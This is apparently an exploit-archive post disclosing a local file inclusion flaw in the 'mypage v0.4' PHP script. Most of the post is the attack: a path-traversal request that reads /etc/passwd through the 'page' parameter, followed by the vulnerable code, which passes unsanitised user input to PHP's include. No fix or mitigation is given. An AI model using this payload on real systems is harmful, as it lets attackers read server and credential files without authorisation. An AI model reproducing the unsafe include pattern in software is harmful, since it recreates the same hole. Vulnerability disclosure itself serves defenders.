id: 10364
date: 12/22/2009
title: mypage v0.4 Local File Inclusion Vulnerability
author: BAYBORA
cves: 

==============================================
mypage v0.4 Local File Inclusion Vulnerability
==============================================

#############################################################
# mypage0.4 LFI Vulnerability
 
# Author: BAYBORA
 
##############################################################
 
# Exploit:
 
 
Vuln file: index.php?page=LFI
 
 
Exploit:
 
 
POST http://server/index.php?page=../../../../../../../../etc/passwd
 
index.php
 
if(isset($_GET['page'])){
...
$inhalt=$inhaltsordner."/".$_GET['page'];}
...
$inhalt=str_replace("///","",$inhalt);
if (FALSE==include$inhalt){echo$notfound;}



#  0day.today [2023-03-25]  #